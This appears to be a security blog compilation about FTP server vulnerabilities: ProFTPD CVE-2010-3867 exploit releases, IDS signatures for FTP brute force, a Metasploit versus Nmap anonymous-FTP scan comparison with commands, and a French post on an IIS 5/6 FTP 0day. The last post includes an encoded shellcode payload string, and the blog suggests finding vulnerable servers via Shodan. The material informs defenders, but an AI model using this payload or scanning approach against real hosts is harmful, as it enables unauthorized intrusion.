CVE-2010-3867 : You wanna play with ProFTPD ?

ZDI has discovered, the 2010-09-24, a vulnerability for ProFTPd versions between 1.3.2rc3 and 1.3.3b. This vulnerability, Telnet IAC, allow a remote attacker to execute arbitraty remote code on vulnerable installations of ProFTPD without authentication.

The 2010-11-02, ZDI and ProFTPD teams have release coordinated advisories (ZDI-10-229) and version 1.3.3c fixing the Telnet IAC remote exploit.

As always, security researchers have jump on the advisories to create valid public PoC or exploit.

Rapid7 Team, between jduck, has integrate into Metasploit, the 2010-11-04, a valid exploit targeting :

The 2010-11-07, Kingcope has release on Exploit-DB (EDB-ID-15449) a valid exploit for :

  • ProFTPD 1.3.3a on FreeBSD 8.1 i386
  • ProFTPD 1.3.2a/e/c on FreeBSD 8.0/7.3/7.2 i386
  • ProFTPD 1.3.2e (Plesk binary) on Debian GNU/Linux 5.0
  • ProFTPD 1.3.3 (Plesk binary) on Debian GNU/Linux 5.0
  • ProFTPD 1.3.2e (Plesk binary) on Debian GNU/Linux 4.0
  • ProFTPD 1.3.3a (distro binary) on Debian Linux Squeeze/sid
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 9.3
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 10.0/10.3
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 10.2
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 11.0
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 11.1
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux SLES 10
  • ProFTPD 1.3.2e (Plesk binary) on CentOS 5

What is interesting in the Kingcope exploit, is to see all the “Plesk binaries” impacted by the vulnerability. At least all Plesk versions between 9.5 and 10.0 included are vulnerables. Just play with Shodan and you will get a list of thousands vulnerables servers.

Here under a demonstration video of the both exploits.

SUC020 : Potential FTP non anonymous Login and/or Brute-Force attempt

  • Use Case Reference : SUC020
  • Use Case Title : Potential FTP non anonymous Login and/or Brute-Force attempt
  • Use Case Detection : Firewall / IDS / FTP logs
  • Attacker Class : Opportunists / Targeting Opportunists
  • Attack Sophistication : Unsophisticated / Low
  • Identified tool(s) : Random
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 21/TCP

Possible(s) correlation(s) :

  • FTP brute force bot.

Source(s) :

Emerging Threats SIG 2002383 triggers are :

  • The FTP server should return the error code “530” and the string “Login”, or the string “User”, or the string “Failed”, or the string “Not”.
  • The source port should be the port 21 of the HOME_NET FTP server in destination of an EXTERNAL_NET IP.
  • Alerts every 5 occurrences of the event targeting the same EXTERNAL_NET IP during 300 seconds.

Emerging Threats SIG 2003303 triggers are :

  • The string “USER” should be present.
  • The strings “PASS”, “anonymous” or “ftp” shouldn’t not be present.
  • The source IP should be part of EXTERNAL_NET in destination of HOME_NET ftp server on port 21.
  • Alert on every occurrence.
Emerging Threat SIG 2010643 triggers are :
  • The string “USER” should be present.
  • The string “administrator” should be present.
  • The source IP should be part of EXTERNAL_NET in destination of HOME_NET ftp server on port 21.
  • Alerts every 5 occurrences of the event targeting the same EXTERNAL_NET IP during 60 seconds.
SIG 2002383 1 Week events activity
SIG 2002383 1 Week events activity
SIG 2003303 1 Week events activity
SIG 2003303 1 Week events activity
SIG 2010643 1 Week events activity
SIG 2010643 1 Week events activity
SIG 2002383 1 month events activity
SIG 2002383 1 month events activity
SIG 2003303 1 month events activity
SIG 2003303 1 month events activity
SIG 2010643 1 month events activity
SIG 2010643 1 month events activity
1 Month TOP 10 source IPs for SIG 2002383
1 Month TOP 10 source IPs for SIG 2002383
1 Month TOP 10 source IPs for SIG 2003303
1 Month TOP 10 source IPs for SIG 2003303
1 Month TOP 10 source IPs for SIG 2010643
1 Month TOP 10 source IPs for SIG 2010643
TOP 20 source countries for SIG 2002383
TOP 20 source countries for SIG 2002383
TOP 20 source countries for SIG 2003303
TOP 20 source countries for SIG 2003303
TOP 20 source countries for SIG 2010643
TOP 20 source countries for SIG 2010643

Anonymous FTP scanning differences between Metasploit and Nmap

Metasploit has a auxiliary module dedicated to anonymous FTP scanning. I was interest to compare this Metasploit module with Nmap ftp-anon NSE script.

I decided to scan a /19 rang, how represent 8192 IP addresses with the 2 tools, compare the results and the time to do these scans.

    Metasploit

    Just play with Metasploit cli to have the possibility, without configuring the Metasploit database, to measure the needed time to do the complete scan.
    time ./msfcli auxiliary/scanner/ftp/anonymous ConnectTimeout=1 FTPTimeout=1 RHOSTS=xxx.xxx.xxx.0/19 E
    By default, the Metasploit ftp_anonymous auxiliary module is single threaded, you can if you want increase the number of thread  by setting the THREADS variable. We will not change this default configuration, cause Nmap is single threaded.  But we will decrease the ConnectTimeout and FTPTimeout advanced configuration to 1 second.
    Metasploit has take around 75 minutes to scan all the 8192 IP addresses, and return us 35 anonymous FTP.
    With 256 threads, to be fair ^^, Metasploit scans the 8192 IP addresses in 1 minute 27seconds. (LOL)
    We had these kinds of results :
    [*] aaa.aaa.aaa.aaa:21 Anonymous READ (220 aaa.aaa.aaa.aaa FTP server ready)
    [*] Scanned 4075 of 8192 hosts (050% complete)
    [*] Auxiliary module execution completed
    [*] bbb.bbb.bbb.bbb:21 Anonymous READ/WRITE (220 Welcome to my FTP Server)
    [*] Scanned 5045 of 8192 hosts (060% complete)
    [*] Auxiliary module execution completed
    To test if the anonymous FTP is writable, Metasploit try to create a directory with the MKD command, and if the creation is successful, this directory is directly deleted by the RMD command. If the anonymous FTP is not writable, then he is logically only readable 🙂 In addition Metasploit will also grab the FTP banners of the anonymous FTP server.

    Nmap

    With Nmap, the following command will permit you to scan anonymous FTP, grab the banner and fingerprint the service, but will not test for you if the anonymous FTP is writable or not.
    time sudo nmap -p21 -n -sC -sV –script=banner –script=ftp-anon xxx.xxx.xxx.0/19
    Nmap has take around 20 minutes to scan all the 8192 IP addresses, and return us only 11 anonymous FTP.
    We has these kinds of results :
    Nmap scan report for aaa.aaa.aaa.aaa
    Host is up (0.026s latency).
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     ProFTPD
    |_banner: 220 aaa.aaa.aaa.aaa FTP server ready
    |_ftp-anon: Anonymous FTP login allowed
    Service Info: Host: aaa.aaa.aaa.aaa; OS: Unix
    Nmap scan report for bbb.bbb.bbb.bbb
    Host is up (0.027s latency).
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp
    |_banner: 220 Welcome to my FTP Server
    |_ftp-anon: Anonymous FTP login allowed
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
    SF-Port21-TCP:V=5.21%I=7%D=5/16%Time=4BF05218%P=i386-apple-darwin9.8.0%r(N
    SF:ULL,1E,”220\x20Welcome\x20to\x20my\x20FTP\x20Server\r\n”)%r(GenericLine
    SF:s,33,”220\x20Welcome\x20to\x20my\x20FTP\x20Server\r\n500\x20Unknown\x20
    SF:Command\r\n”)%r(Help,33,”220\x20Welcome\x20to\x20my\x20FTP\x20Server\r\
    SF:n500\x20Unknown\x20Command\r\n”)%r(SMBProgNeg,33,”220\x20Welcome\x20to\
    SF:x20my\x20FTP\x20Server\r\n500\x20Unknown\x20Command\r\n”);
    Service Info: Host: my
    We have test 2 times the complete scans with Metasploit and Nmap, and we got the same results. What is surprising is the difference between the number of anonymous FTP detected by Metasploit (and verified by hand later) and the results of Nmap.
    As suggested by Ron Bowes, I tested a different approach for the Nmap anon-ftp scanning, to increase the time optimization.
    First test with :
    time sudo nmap -p21 -PS -n –script=ftp-anon xxx.xxx.xxx.0/19
    Nmap has finish the scan in 6 minutes and 20 seconds, still more than Metasploit, but no more 20 minutes.
    Second test with :
    time sudo nmap -p21 -PS -n -T4 –script=ftp-anon xxx.xxx.xxx.0/19
    Nmap has finish the scan in 6 minutes and 35 seconds, the -T4 option doesn’t has change anything in term of performances.
    Ron has also confirm that nmap anon-ftp LUA script is missing some anonymous FTP, and this randomly.

IIS5 & 6 FTP Stack Overflow 0day

Kingcope a diffusé, aujourd’hui dans la journée, sur la mailing-list Full Disclosure, un 0Day visant IIS 5 et 6 par le biais du service FTP intégré dans IIS de Windows 2000. Ce 0Day à plusieurs comportements :

– pour IIS 5 sous Windows 2000, l’exploit fournit un accès shell au serveur permettant de le compromettre, mais requiert une authentification quelconque (par exemple anonymous, client d’oeil à Damien ….), et que l’utilisateur FTP puisse créer un répertoire. Difficilement exploitable en anonymous smile.gif

– pour IIS 6 sous Windows 2003, l’exploit permet d’effectuer un déni de service (DoS) sur le serveur web, rendant celui-ci inaccessible. (va y avoir du DoS dans l’air).

#Microsoft Internet Information Server 5.0/6.0
#FTP Server Remote Stack Based Overrun
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8

Pour se protéger de ces tentatives d’exploitation, biensûr ne donner un accès FTP qu’à des utilisateurs de confiance.

Il est aussi possible de détecter cette attaque par le biais de l’IDS Snort avec la règle VRT : (ftp_telnet) FTP command parameters were too long

SITE KSEXY‰âÚÞÙrô[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEU
BXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ
4C1JKCVLKDLPKLKQOELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEX
MYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGC
YBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0BLBOCSE1BLBGCBBOCEBPGPG1BDBME9BN
BIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVV